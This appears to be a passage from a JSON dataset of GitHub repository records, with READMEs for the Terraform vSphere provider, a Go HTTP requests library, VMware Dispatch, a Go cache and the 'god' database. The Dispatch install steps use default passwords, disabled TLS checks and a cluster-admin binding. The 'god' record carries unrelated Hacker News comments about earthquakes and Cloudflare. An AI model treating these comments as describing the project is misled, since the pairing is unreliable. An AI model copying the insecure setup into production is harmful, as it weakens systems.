project][terraform-github] on GitHub.\n\n* [Go 1.19][golang-install]\n\n Required if building the provider.\n\n* [VMware vSphere][vmware-vsphere-documenation]\n\n The provider supports VMware vSphere versions in accordance with the VMware Product Lifecycle Matrix from General Availability to End of General Support.\n\n Learn more: [VMware Product Lifecycle Matrix][vmware-product-lifecycle-matrix]\n\n > **NOTE**\n >\n > This provider requires API write access and is therefore **not supported** for use with a free VMware vSphere Hypervisor license.\n\n## Using the Provider\n\nThe Terraform Provider for VMware vSphere is an official provider. Official providers are maintained by the Terraform team at [HashiCorp][hashicorp] and are listed on the [Terraform Registry][terraform-registry]. \n\nTo use a released version of the Terraform provider in your environment, run `terraform init` and Terraform will automatically install the provider from the Terraform Registry.\n\nUnless you are contributing to the provider or require a pre-release bugfix or feature, use an **officially** released version of the provider.\n\nSee [Installing the Terraform Provider for VMware vSphere][provider-install] for additional instructions on automated and manual installation methods and how to control the provider version.\n\nFor either installation method, documentation about the provider configuration, resources, and data sources can be found on the Terraform Registry.\n\n## Upgrading the Provider\n\nThe provider does not upgrade automatically. After each new release, you can run the following command to upgrade the provider:\n\n```shell\nterraform init -upgrade\n```\n\n## Contributing\n\nThe Terraform Provider for VMware vSphere is the work of many contributors and the project team appreciates your help!\n\nIf you discover a bug or would like to suggest an enhancement, submit [an issue][provider-issues]. 
Once submitted, your issue will follow the [lifecycle][provider-issue-lifecycke] process.\n\nIf you would like to submit a pull request, please read the [contribution guidelines][provider-contributing] to get started. In case of enhancement or feature contribution, we kindly ask you to open an issue to discuss it beforehand.\n\nLearn more in the [Frequently Asked Questions][provider-faq].\n\n## License\n\nThe Terraform Provider for VMware vSphere is available under the [Mozilla Public License, version 2.0][provider-license] license.\n\n[golang-install]: https://golang.org/doc/install\n[hashicorp]: https://hashicorp.com\n[provider-contributing]: docs/CONTRIBUTING.md\n[provider-documentation]: https://registry.terraform.io/providers/hashicorp/vsphere/latest/docs\n[provider-discussions]: https://discuss.hashicorp.com/tags/c/terraform-providers/31/vsphere\n[provider-faq]: docs/FAQ.md\n[provider-install]: docs/INSTALL.md\n[provider-issues]: https://github.com/hashicorp/terraform-provider-vsphere/issues/new/choose\n[provider-issue-lifecycke]: docs/ISSUES.md\n[provider-license]: LICENSE\n[terraform-install]: https://www.terraform.io/downloads.html\n[terraform-github]: https://github.com/hashicorp/terraform\n[terraform-registry]: https://registry.terraform.io\n[vmware-esxi]: https://www.vmware.com/products/esxi-and-esx.html\n[vmware-product-lifecycle-matrix]: https://lifecycle.vmware.com\n[vmware-vcenter]: https://www.vmware.com/products/vcenter-server.html\n[vmware-vsphere-documenation]: https://docs.vmware.com/en/VMware-vSphere\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "carlmjohnson/requests", "link": "https://github.com/carlmjohnson/requests", "tags": ["golang", "requests", "http", "http-client", "convenience", "helper"], "stars": 533, "description": "HTTP requests for Gophers", "lang": "Go", "repo_lang": "", "readme": "# Requests [![GoDoc](https://godoc.org/github.com/carlmjohnson/requests?status.svg)](https://godoc.org/github.com/carlmjohnson/requests) [![Go Report Card](https://goreportcard.com/badge/github.com/carlmjohnson/requests)](https://goreportcard.com/report/github.com/carlmjohnson/requests) [![Gocover.io](https://gocover.io/_badge/github.com/carlmjohnson/requests)](https://gocover.io/github.com/carlmjohnson/requests) [![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\n![Requests logo](/img/gopher-web.png)\n\n## _HTTP requests for Gophers._\n\n**The problem**: Go's net/http is powerful and versatile, but using it correctly for client requests can be extremely verbose.\n\n**The solution**: The requests.Builder type is a convenient way to build, send, and handle HTTP requests. Builder has a fluent API with methods returning a pointer to the same struct, which allows for declaratively describing a request by method chaining.\n\nRequests also comes with tools for building custom http transports, include a request recorder and replayer for testing.\n\n## Examples\n### Simple GET into a string\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
code with net/http | code with requests
\n\n```go\nreq, err := http.NewRequestWithContext(ctx, \n\thttp.MethodGet, \"http://example.com\", nil)\nif err != nil {\n\t// ...\n}\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\nb, err := io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\ns := string(b)\n```\n\n\n\n```go\nvar s string\nerr := requests.\n\tURL(\"http://example.com\").\n\tToString(&s).\n\tFetch(ctx)\n```\n\n
11+ lines | 5 lines
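\n\nBoth columns above assume a `ctx` value is already in scope. A minimal way to create one is sketched below; the timeout value and variable names are illustrative assumptions, not part of the upstream README:\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"time\"\n)\n\nfunc main() {\n\t// A request-scoped context with a timeout; pass ctx to Fetch(ctx)\n\t// or http.NewRequestWithContext(ctx, ...) in the snippets above.\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\t_ = ctx\n}\n```\n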
\n\n\n### POST a raw body\n\n\n\n\n\n\n\n\n\n\n\n
code with requests | code with net/http
\n\n```go\nerr := requests.\n\tURL(\"https://postman-echo.com/post\").\n\tBodyBytes([]byte(`hello, world`)).\n\tContentType(\"text/plain\").\n\tFetch(ctx)\n```\n\n\n\n```go\nbody := bytes.NewReader([]byte(`hello, world`))\nreq, err := http.NewRequestWithContext(ctx, http.MethodPost, \n\t\"https://postman-echo.com/post\", body)\nif err != nil {\n\t// ...\n}\nreq.Header.Set(\"Content-Type\", \"text/plain\")\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\n_, err = io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\n```\n\n
5 lines | 12+ lines
\n\n### GET a JSON object\n\n\n\n\n\n\n\n\n\n\n\n
code with requests | code with net/http
\n\n```go\nvar post placeholder\nerr := requests.\n\tURL(\"https://jsonplaceholder.typicode.com\").\n\tPathf(\"/posts/%d\", 1).\n\tToJSON(&post).\n\tFetch(ctx)\n```\n\n\n\n```go\nvar post placeholder\nu, err := url.Parse(\"https://jsonplaceholder.typicode.com\")\nif err != nil {\n\t// ...\n}\nu.Path = fmt.Sprintf(\"/posts/%d\", 1)\nreq, err := http.NewRequestWithContext(ctx, \n\thttp.MethodGet, u.String(), nil)\nif err != nil {\n\t// ...\n}\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\nb, err := io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\nerr = json.Unmarshal(b, &post)\nif err != nil {\n\t// ...\n}\n```\n
7 lines | 18+ lines
\n\n### POST a JSON object and parse the response\n\n```go\nvar res placeholder\nreq := placeholder{\n\tTitle: \"foo\",\n\tBody: \"baz\",\n\tUserID: 1,\n}\nerr := requests.\n\tURL(\"/posts\").\n\tHost(\"jsonplaceholder.typicode.com\").\n\tBodyJSON(&req).\n\tToJSON(&res).\n\tFetch(ctx)\n// net/http equivalent left as an exercise for the reader\n```\n\n### Set custom headers for a request\n\n```go\n// Set headers\nvar headers postman\nerr := requests.\n\tURL(\"https://postman-echo.com/get\").\n\tUserAgent(\"bond/james-bond\").\n\tContentType(\"secret\").\n\tHeader(\"martini\", \"shaken\").\n\tFetch(ctx)\n```\n\n### Easily manipulate query parameters\n\n```go\nvar params postman\nerr := requests.\n\tURL(\"https://postman-echo.com/get?a=1&b=2\").\n\tParam(\"b\", \"3\").\n\tParam(\"c\", \"4\").\n\tFetch(ctx)\n\t// URL is https://postman-echo.com/get?a=1&b=3&c=4\n```\n\n### Record and replay responses\n\n```go\n// record a request to the file system\nvar s1, s2 string\nerr := requests.URL(\"http://example.com\").\n\tTransport(requests.Record(nil, \"somedir\")).\n\tToString(&s1).\n\tFetch(ctx)\ncheck(err)\n\n// now replay the request in tests\nerr = requests.URL(\"http://example.com\").\n\tTransport(requests.Replay(\"somedir\")).\n\tToString(&s2).\n\tFetch(ctx)\ncheck(err)\nassert(s1 == s2) // true\n```\n\n## FAQs\n\n[See wiki](https://github.com/carlmjohnson/requests/wiki) for more details.\n\n### Why not just use the standard library HTTP client?\n\nBrad Fitzpatrick, long time maintainer of the net/http package, [wrote an extensive list of problems with the standard library HTTP client](https://github.com/bradfitz/exp-httpclient/blob/master/problems.md). His four main points (ignoring issues that can't be resolved by a wrapper around the standard library) are:\n\n> - Too easy to not call Response.Body.Close.\n> - Too easy to not check return status codes\n> - Context support is oddly bolted on\n> - Proper usage is too many lines of boilerplate\n\nRequests solves these issues by always closing the response body, checking status codes by default, always requiring a `context.Context`, and simplifying the boilerplate with a descriptive UI based on fluent method chaining.\n\n### Why requests and not some other helper library?\n\nThere are two major flaws in other libraries as I see it. One is that in other libraries support for `context.Context` tends to be bolted on if it exists at all. Two, many hide the underlying `http.Client` in such a way that it is difficult or impossible to replace or mock out. 
Beyond that, I believe that none have acheived the same core simplicity that the requests library has.\n\n### How do I just get some JSON?\n\n```go\nvar data SomeDataType\nerr := requests.\n\tURL(\"https://example.com/my-json\").\n\tToJSON(&data).\n\tFetch(ctx)\n```\n\n### How do I post JSON and read the response JSON?\n\n```go\nbody := MyRequestType{}\nvar resp MyResponseType\nerr := requests.\n\tURL(\"https://example.com/my-json\").\n\tBodyJSON(&body).\n\tToJSON(&resp).\n\tFetch(ctx)\n```\n\n### How do I just save a file to disk?\n\nIt depends on exactly what you need in terms of file atomicity and buffering, but this will work for most cases:\n\n```go\n\terr := requests.\n\t\tURL(\"http://example.com\").\n\t\tToFile(\"myfile.txt\").\n\t\tFetch(ctx)\n```\n\nFor more advanced use case, use `ToWriter`.\n\n### How do I save a response to a string?\n\n```go\nvar s string\nerr := requests.\n\tURL(\"http://example.com\").\n\tToString(&s).\n\tFetch(ctx)\n```\n\n### How do I validate the response status?\n\nBy default, if no other validators are added to a builder, requests will check that the response is in the 2XX range. If you add another validator, you can add `builder.CheckStatus(200)` or `builder.AddValidator(requests.DefaultValidator)` to the validation stack.\n\nTo disable all response validation, run `builder.AddValidator(nil)`.\n\n## Contributing\n\nPlease [create a discussion](https://github.com/carlmjohnson/requests/discussions) before submitting a pull request for a new feature.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vmware-archive/dispatch", "link": "https://github.com/vmware-archive/dispatch", "tags": ["dispatch", "faas", "serverless", "kubernetes", "functions"], "stars": 533, "description": "Dispatch is a framework for deploying and managing serverless style applications.", "lang": "Go", "repo_lang": "", "readme": "> **IMPORTANT:** VMware has ended active development of this project, this repository will no longer be updated.\n\n![Dispatch](docs/assets/images/logo-large.png \"Dispatch Logo\")\n\n> **NOTE:** This is the knative branch of Dispatch. Full Dispatch functionality is still a ways off. The code here\n> represents a work in progress. For information about Dispatch Solo, the version of Dispatch distributed as an OVA,\n> see [the `solo` branch](https://github.com/vmware/dispatch/tree/solo) or [documentation](https://vmware.github.io/dispatch/documentation/front/overview).\n\nDispatch is a framework for deploying and managing serverless style applications. The intent is a framework\nwhich enables developers to build applications which are defined by functions which handle business logic and services\nwhich provide all other functionality:\n\n* State (Databases)\n* Messaging/Eventing (Queues)\n* Ingress (Api-Gateways)\n* Etc.\n\nOur goal is to provide a substrate which can be built upon and extended to serve as a framework for serverless\napplications. Additionally, the framework must provide tools and features which aid the developer in building,\ndebugging and maintaining their serverless application.\n\n## Documentation\n\nCheckout the detailed [documentation](https://vmware.github.io/dispatch) including a [quickstart guide](https://vmware.github.io/dispatch/documentation/front/quickstart).\n\n## Architecture\n\n> **NOTE**: The information in this section is specific to the knative branch of Dispatch. 
Equivalent documentation for Dispatch Solo can be found on [the `solo` branch](https://github.com/vmware/dispatch/tree/solo#architecture).\n\nThe diagram below illustrates the different components which make up the Dispatch project:\n\n![initial dispatch architecture diagram](docs/_specs/dispatch-v2-architecture.png \"Initial Architecture\")\n\n## Installation\n\n> **NOTE**: The information in this section is specific to the knative branch of Dispatch. Equivalent documentation for Dispatch Solo can be found on [the `solo` branch](https://github.com/vmware/dispatch/tree/solo#installation).\n\n### Prerequisites\n\n#### GKE\n\n1. [Create service account key](https://cloud.google.com/iam/docs/creating-managing-service-account-keys#iam-service-account-keys-create-console)\n ```bash\n export GCLOUD_KEY=\n ```\n\n2. Create GKE cluster:\n ```bash\n K8S_VERSION=1.10.7-gke.6\n export CLUSTER_NAME=dispatch-knative\n gcloud container clusters create -m n1-standard-4 --cluster-version ${K8S_VERSION} ${CLUSTER_NAME}\n gcloud container clusters get-credentials ${CLUSTER_NAME}\n ```\n\n3. Install Knative:\n ```bash\n # Get the current knative verision used with dispatch\n KNATIVE_VERSION=$(cat Gopkg.toml | grep -A 2 'name = \"github.com/knative/serving\"' | grep revision | cut -d '\"' -f2)\n ./scripts/install-knative.py ${CLUSTER_NAME} --gcloud-key=${GCLOUD_KEY} --revision=${KNATIVE_VERSION}\n ```\n\n#### VMware Cloud PKS\n\n1. Create a Cloud PKS cluster **with privileged mode enabled**.\n ```bash\n export VKE_CLUSTER=dispatch-knative\n vke cluster create --privilegedMode --name $VKE_CLUSTER --cluster-type PRODUCTION --region us-west-2\n ```\n\n2. Get kubectl credentials:\n ```bash\n vke cluster auth setup $VKE_CLUSTER\n ```\n\n3. Install Knative:\n 1. Install Istio:\n ```bash\n kubectl apply -f third-party/vmware-cloud-pks/istio-1.0.2/istio.yaml\n ```\n 2. Wait for Istio pods to become READY (will take a little while to scale up smart cluster):\n ```bash\n kubectl get pods -n istio-system\n NAME READY STATUS RESTARTS AGE\n istio-citadel-746c765786-2cm5p 1/1 Running 0 6m\n istio-cleanup-secrets-vbqk7 0/1 Completed 0 6m\n istio-egressgateway-57df84cfcf-hpkx4 1/1 Running 0 6m\n istio-galley-5b4f774c-9gcqm 1/1 Running 0 6m\n istio-ingressgateway-76dbd65c-7qf2w 1/1 Running 0 6m\n istio-pilot-7ddfbdf465-cj5jl 2/2 Running 0 6m\n istio-policy-56789fbb8c-flxkz 2/2 Running 0 6m\n istio-statsd-prom-bridge-7c77ddc9b9-s2zwl 1/1 Running 0 6m\n istio-telemetry-855bb88878-kbhsj\n ```\n 3. Install Knative serving (includes build):\n ```bash\n kubectl apply -f third-party/vmware-cloud-pks/serving-0.2.2/release.yaml\n ```\n\n#### Other\n\nIn order to install Knative, follow the [development instructions](https://github.com/knative/serving/blob/master/DEVELOPMENT.md)\n\n## Dispatch\n\nInstalling Dispatch depends on having a Kubernetes cluster with the Knative components installed (Build, Serving and soon Eventing). From here build and install dispatch as follows:\n\n1. Set the following environment variables:\n ```bash\n export DISPATCH_NAMESPACE=\"default\"\n export DISPATCH_DEBUG=\"true\"\n export RELEASE_NAME=\"dispatch\"\n export MINIO_USERNAME=\"dispatch\"\n export MINIO_PASSWORD=\"dispatch\"\n export INGRESS_IP=$(kubectl get service -n istio-system knative-ingressgateway -o wide | tail -n1 | awk '{print $4}')\n ```\n\n2. 
Build and publish a dispatch image (**Substitute in your docker repository**):\n >Note: if you just want to use a pre-created image use the script to create your `values.yaml` and continue to step 4.\n >```bash\n >TAG=\"v0.1.22-knative\" ./scripts/values.sh\n >```\n\n ```bash\n DISPATCH_SERVER_DOCKER_REPOSITORY= PUSH_IMAGES=1 make images\n ```\n\n3. The previous command will output a configuration file `values.yaml`:\n ```yaml\n image:\n host: username\n tag: v0.1.xx\n registry:\n url: http://dispatch-docker-registry:5000/\n repository: dispatch-docker-registry:5000\n storage:\n minio:\n address: dispatch-minio:9000\n username: ********\n password: ********\n ```\n\n4. Deploy via helm chart (if helm is not installed and initialized, do that first):\n ```bash\n helm init --wait\n # helm won't overwrite the existing config-maps (at least not the first/install time), so explicitly delete them.\n kubectl delete configmap -n knative-serving config-domain config-network\n helm dependency build ./charts/dispatch/\n helm upgrade -i --debug ${RELEASE_NAME} ./charts/dispatch --namespace ${DISPATCH_NAMESPACE} -f values.yaml\n ```\n > **NOTE**: Use following to create cluster role binding for tiller:\n >```bash\n >kubectl create clusterrolebinding tiller-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default\n >```\n\n5. Reconfigure Knative serving (need to whitelist our internal repository):\n ```bash\n ./scripts/configure-knative.sh\n ```\n\n6. Build the CLI (substitute darwin for linux if needed):\n ```bash\n make cli-darwin\n # Create symlink to binary\n ln -s `pwd`/bin/dispatch-darwin /usr/local/bin/dispatch\n ```\n\n7. Create the Dispatch config:\n ```bash\n cat << EOF > config.json\n {\n \"current\": \"${RELEASE_NAME}\",\n \"contexts\": {\n \"${RELEASE_NAME}\": {\n \"host\": \"$(kubectl -n ${DISPATCH_NAMESPACE} get service ${RELEASE_NAME}-nginx-ingress-controller -o wide | tail -n1 | awk '{print $4}')\",\n \"port\": 443,\n \"scheme\": \"https\",\n \"insecure\": true\n }\n }\n }\n EOF\n # point to the config file (could also move to ~/.dispatch/config)\n export DISPATCH_CONFIG=`pwd`/config.json\n ```\n\n8. 
Test out your install:\n First, create an baseimage:\n ```bash\n dispatch create base-image python3-base dispatchframework/python3-base:0.0.13-knative\n Created baseimage: python3-base\n ```\n Then, create an image:\n ```bash\n dispatch create image python3 python3-base\n Created image: python3\n ```\n Wait for status READY:\n ```bash\n dispatch get images\n NAME | DESTINATION | BASEIMAGE | STATUS | CREATED DATE\n --------------------------------------------------------------------------\n python3 | *********** | ********* | READY | Tue Sep 25 16:51:35 PDT 2018\n ```\n Create a function:\n ```bash\n dispatch create function --image python3 hello ./examples/python3/hello.py\n Created function: hello\n ```\n Once status is READY:\n ```bash\n dispatch get function\n NAME | FUNCTIONIMAGE | STATUS | CREATED DATE\n ----------------------------------------------------------------\n hello | ************* | READY | Thu Sep 13 12:41:07 PDT 2018\n ```\n Exec the function:\n ```bash\n dispatch exec hello <<< '{\"name\": \"user\"}' | jq .\n {\n \"context\": {\n \"logs\": {\n \"stdout\": [\n \"messages to stdout show up in logs\"\n ],\n \"stderr\": null\n }\n },\n \"payload\": {\n \"myField\": \"Hello, user from Nowhere\"\n }\n }\n ```\n Create an endpoint:\n ```bash\n dispatch create endpoint get-hello hello --method GET --method POST --path /hello\n ```\n Hit the endpoint with curl:\n ```bash\n curl -v http://${INGRESS_IP}/hello?name=Jon -H 'Host: default.${DISPATCH_NAMESPACE}.dispatch.local'\n ```\n\nFor a more complete quickstart see the [developer documentation](#documentation)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goburrow/cache", "link": "https://github.com/goburrow/cache", "tags": ["cache", "lru", "slru", "tinylfu", "golang"], "stars": 532, "description": "Mango Cache \ud83e\udd6d - Partial implementation of Guava Cache in Go (golang).", "lang": "Go", "repo_lang": "", "readme": "# Mango Cache\n[![GoDoc](https://godoc.org/github.com/goburrow/cache?status.svg)](https://godoc.org/github.com/goburrow/cache)\n![Go](https://github.com/goburrow/cache/workflows/Go/badge.svg)\n\nPartial implementations of [Guava Cache](https://github.com/google/guava) in Go.\n\nSupported cache replacement policies:\n\n- LRU\n- Segmented LRU (default)\n- TinyLFU (experimental)\n\nThe TinyLFU implementation is inspired by\n[Caffeine](https://github.com/ben-manes/caffeine) by Ben Manes and\n[go-tinylfu](https://github.com/dgryski/go-tinylfu) by Damian Gryski.\n\n## Download\n\n```\ngo get -u github.com/goburrow/cache\n```\n\n## Example\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"math/rand\"\n\t\"time\"\n\n\t\"github.com/goburrow/cache\"\n)\n\nfunc main() {\n\tload := func(k cache.Key) (cache.Value, error) {\n\t\ttime.Sleep(100 * time.Millisecond) // Slow task\n\t\treturn fmt.Sprintf(\"%d\", k), nil\n\t}\n\t// Create a loading cache\n\tc := cache.NewLoadingCache(load,\n\t\tcache.WithMaximumSize(100), // Limit number of entries in the cache.\n\t\tcache.WithExpireAfterAccess(1*time.Minute), // Expire entries after 1 minute since last accessed.\n\t\tcache.WithRefreshAfterWrite(2*time.Minute), // Expire entries after 2 minutes since last created.\n\t)\n\n\tgetTicker := time.Tick(100 * time.Millisecond)\n\treportTicker := time.Tick(5 * time.Second)\n\tfor {\n\t\tselect {\n\t\tcase <-getTicker:\n\t\t\t_, _ = c.Get(rand.Intn(200))\n\t\tcase <-reportTicker:\n\t\t\tst := cache.Stats{}\n\t\t\tc.Stats(&st)\n\t\t\tfmt.Printf(\"%+v\\n\", 
st)\n\t\t}\n\t}\n}\n```\n\n## Performance\n\nSee [traces](traces/) and [benchmark](https://github.com/goburrow/cache/wiki/Benchmark)\n\n![report](traces/report.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zond/god", "link": "https://github.com/zond/god", "tags": [], "stars": 532, "description": "A Go database", "lang": "Go", "repo_lang": "", "readme": "god\n===\n\ngod is a scalable, performant, persistent, in-memory data structure system. It allows massively distributed applications to update and fetch common data in a structured and sorted format.\n\nIts main inspirations are Redis and Chord/DHash. Like Redis it focuses on performance, ease of use, and a small, simple yet powerful feature set, while from the Chord/DHash projects it inherits scalability, redundancy, and transparent failover behaviour.\n\n# Try it out\n\nInstall Go, git, Mercurial and gcc, go get github.com/zond/god/god_server, run god_server, browse to http://localhost:9192/.\n\n# Embed it in your Go application\n\n```\nimport \"github.com/zond/god/dhash\"\ns := dhash.NewNodeDir(fmt.Sprintf(\"%v:%v\", listenIp, listenPort), fmt.Sprintf(\"%v:%v\", broadcastIp, broadcastPort), dataDir)\ns.MustStart()\ns.MustJoin(fmt.Sprintf(\"%v:%v\", joinIp, joinPort))\n```\n\n# Documents\n\nHTML documentation: http://zond.github.com/god/\n\ngodoc documentation: http://godoc.org/github.com/zond/god\n\n# TODO\n\n* Docs\n * Add illustrations to the usage manual\n* Benchmark\n * Consecutively start 1-20 instances on equally powerful machines and benchmark against each size\n * Need 20 machines of equal and constant performance. Is anyone willing to lend me this for few days of benchmarking?\n * Add benchmark results to docs\n", "readme_type": "markdown", "hn_comments": "I'm just across the border from Chicago in Indiana.... and if New Madrid goes off, there is a small but non-zero chance my house will fall off its piers. (We have no basement/foundation) Mitigating this risk is something I can't begin to afford.As someone with extended family living in SE Missouri, I can say this is VERY well known to them. I've seen a coffee table book one of them had with black/white pictures of some of the destruction from the quake there that spawned Reelfoot Lake, and it was enough to give one pause.All my daydreams are disasters.When I was a freshman at Missouri-Rolla (now Missouri S&T) this guy, Iben Browning, predicted that there would be a major earthquake on the New Madrid fault line in December. I think a few schools even closed for the day in the area because some parents were so freaked out about it. It was just the craziest scene that people believed that this nut job could actually predict an earthquake.I wrote a thing about touring this place with geologists a few years back: https://idlewords.com/2015/07/confronting_new_madrid.htmI grew up around here. In 1990 a scientist (Dr. Browning) predicted there would be a major earthquake on a certain day and most parents kept their kids home from school. My dad, a geophysicist, said the guy was a quack so I had to goto school. It was practically empty that day.Pronounced MAD-rid.I live in Madrid, Spain, a zone not prone to any earthquakes and the title startled me quite a bit.The last memorable earthquake in the Midwest was the 5.2 \"tremor\" of 2008 [0] just north of the New Madrid fault. It was felt as far away as Georgia and Nebraska. 
I recall a scientist quoted as saying that the area \"rung like a bell\" because it occurred in the stable interior craton. It caused some minor damage like a few bricks falling off a couple buildings. I was working in a 2nd story building and felt the the upper cabinet of my office vibrate a little.[0] https://en.m.wikipedia.org/wiki/2008_Illinois_earthquakeMy experience with the Cloudflare sales team is they were woefully disconnected from any ability to make good on their promises, and that it didn\u2019t matter to them at all. It was a strange narcissism -bit wasn\u2019t that they were deliberately lying, it was as if the notion of truth and lies didn\u2019t matter. That if they kept blabbering assumed that they\u2019d get the sale.In general you can\u2019t trust salespeople and need to get everything in writing. Cloudflare is a prime example of why.And I\u2019d add in my case because we were keeping track of their promises, we caught them before the sales process completed. It cost them seven figures a year. But maybe it doesn\u2019t matter - their sales approach still has them worth $20 billion.Maybe they booted you because your business model is to use Cloudflare to repeatedly and aggressively scrape data from cryptocurrency exchanges and then resell it for hundreds of dollars a month.Sounds like an abuse of their terms of service to me.From an earlier comment I made regarding Stripe shutting merchants down, and those merchants resorting to posting on HN and getting someone on HN to advocate for them to resolve their problem [0]:\"The main issue is not that [COMPANY] is working hard to protect itself and its customers, but that customers feel very powerless in these situations. When it takes a massive effort to get attention, especially if you're small and powerless, you feel that you have no control, and that your issues will go unanswered. What can the average, powerless customer who doesn't have the weight of social media, HN, @dang, or others on their side do when their hard-earned money or business is being held, locked, or otherwise prevented, and when the cause is not fraudulent, or if the customer is unaware of that activity? The problem is that accounts are just shut down, moneys are held, and there's no quick or clear communication, with customer support simply saying it's not in their control. It's this feeling of powerlessness that's the issue, regardless of whether or not [COMPANY] is in its rights or doing what it feels is in its and its customers best interests.What can you do to help empower the powerless customers when their livelihoods are at stake? Can you provide some way to not instantly assume fraud or malicious intent on behalf of the customer and provide some quick and direct way for the customer to feel empowered?\"Having to resort to HN to get major problems resolved that are major customer service and potential legal / liability issues causes me a lot of stress when I realize that I have don't have nearly the same sort of power or influence as some of the others here do on HN. I worry that my complaints would simply go ignored.@jgrahamc would love you to comment on what we can do to avoid people having to resort to HN for a solution to these problems, which favors the well-connected and squeaky wheels and disfavors everyone else.[0] https://news.ycombinator.com/item?id=34274456Also want to be kept updated on this issue since it touches some clients of mineLiterally just sent an email to my devops guys to move off cloudflare asap. 
This cavalier lack of respect is a diservice and insult to all the people who rely on my product for their livelihood.I've been interested in using Cloudflare Workers as the backend for an application. I don't care about caching or anything like that, but, can I serve exclusively non-html content from my Cloudflare Workers? Or is that a violation of their ToS?I would have never honestly considered serving _html_ from a Worker. I hope we can get an extremely clear statement from Cloudflare on what their policy is.Sales said something would never happen...Word of warning: don't use cloudflareOr really any service that has it written that they can end your business without notice~> ...anyways I get it, perhaps I pay too little and should be on enterprise plan alreadyIf you're on Workers Unbound, you're probably paying closer to ~$800/mo for 4b requests; or if you're on Workers Bundled, then ~2000/mo. What were you quoted for the Enterprise plan? I thought those start at $1500/mo?Glad to hear this got resolved. Heads-up that your name may be infringing on a US trademark held by the BBC.Cloudflare has published a blog post about this event: https://blog.cloudflare.com/how-cloudflare-erroneously-throt...Was your account disabled including the DNS?Sad it happened. This highlights why it is important to reduce your exposure to external services. Right now I just deploy on bare metals servers and are ready to move them if need to. As they say, there's no cloud - just someone's else' computerCloudflare has gotten incredibly bad lately. If you don't want to offer your services to someone that's fine but you should at least do the bare minimum and reach out before completely terminating a vital piece of infrastructure they rely on.Oh, it looks like Cloudflare is no longer a good choice. We had very similar experience with Ionic. We tried to put our money in, but no one was interested.I've recently dropped and then readded (a few months later) a zone to Cloudflare for a domain only I ever owned. And they refused to add it for \"policy\" reasons, so I had to wait a week or so until Cloudflare just unlocked it without providing any rationale.It's not a company I trust to not randomly screw me over out of the blue anymore.I went to look at your website to see what the service was about\u2026 but of course it\u2019s down :(good to know. will make sure to never give cloudflare a dime.Cloudflare pricing is crazy rabbit hole. What are the triggers the need to migrate to Cloudflare enterprise? moreover is possible to just be pay-per use?OP, you have garnered a lot of sympathy by the HN community which I believe in part contributed to your problem being resolved. I think it would be fair to provide more info about what the issue was in the end. It's not OK to be like \"HN I had a bad experience with Company X\" and then be like \"k, thx @jgrahamc, bye\" when your complaint gets resolved due to the attention it received.There are so many questions this leaves unanswered:- Was this a one-off error in Cloudflare's processes? (These things happen on a big enough scale.)- Were you violating a specific clause of Cloudflare's T&C? How clear was the clause? What did you do to fix this?- Was the issue that Cloudflare estimated that you're not paying enough given the bandwidth you're consuming? 
Did you end up signing up for the Enterprise plan?Transparency would benefit both Cloudflare (in not making people unnecessarily apprehensive about becoming/remaining a customer) and you (in demonstrating that you're handling this issue in a professional and responsible manner).If anyone interested here\u2019s what happened https://news.ycombinator.com/item?id=34696763 \nI was not aware about the spike in bandwidth, will also try to handle such cases on my side better.Wow very interesting product, what\u2019s your GTM strategyCloudflare: MitMaaShttps://framagit.org/dCF/deCloudflare/-/blob/master/readme/e...I see accounts like this all the time, I run into the endless loop of cloudflare refusing to serve me a webpage all the time. Somehow clicking the captcha seems to do nothing. I don't know if it's my insistence on using my browser of choice, or my regular clearing of cookies or what have you while trying to keep my laptop secure.All I know is to me Cloudflare seems to be a gatekeeper of the worst kind, the kind that blocks me from accessing the content I seek to load.And the idea that it somehow is protecting the web seems more and more ludicrous each tale like this I read. With each page that is delayed in a loop before finally letting me read it, I become more and more convinced at the sheer uselessness of it. Why does anyone bother with it in the first place when it clearly doesn't actually work and worse can be turned against you at any time?Can someone explain to me why anyone would pay for this SaaS, and instead just use an api from all markets?This is very worrying.I use Workers to cache and stream audio. I was under the impression Workers were under a different TOS since the business model is totally different and paid per req.I've asked internally to understand this.While I agree HN shouldn't be used as a way to get direct customer support, I don't think it's fair to grab and point our pitchforks to @jgrahamc over a one sided story. There's not nearly enough information from both sides to create fair judgement (these things happen, unfortunately, at larger scale with automated processes). What matters is the afterthought and actions taken of what's going to prevent a similar situation in the future (which I'd love to read from both OP and @jgrahamc if possible). HN is my go to stop for well formulated opinions written by people way smarter than me and I think we dropped the ball here, HN can do better. That said, happy that your issue got resolved OP and goodluck with your project!Oh my, 2.8 is \"great\".\nTime to reread the service terms.\nAnd it is in the times of API-s (and 20 years since ajax). Otherwise, this means that we can use workers for some stuff but need to use another provider for other stuff. Complexity overload, would rather use one provider, unless there are some great savings to move stuff to workers (that could cover the development complexity).4 Billion requests per month involving 1 Petabyte of traffic doesn't seem like a \"small SAAS\", at least packet-wise. If its small revenue-wise, addressing that is a business concern as important as having your platform throttled for using the cheapo economy edition tier of whatever you've signed up for with Cloudflare. 
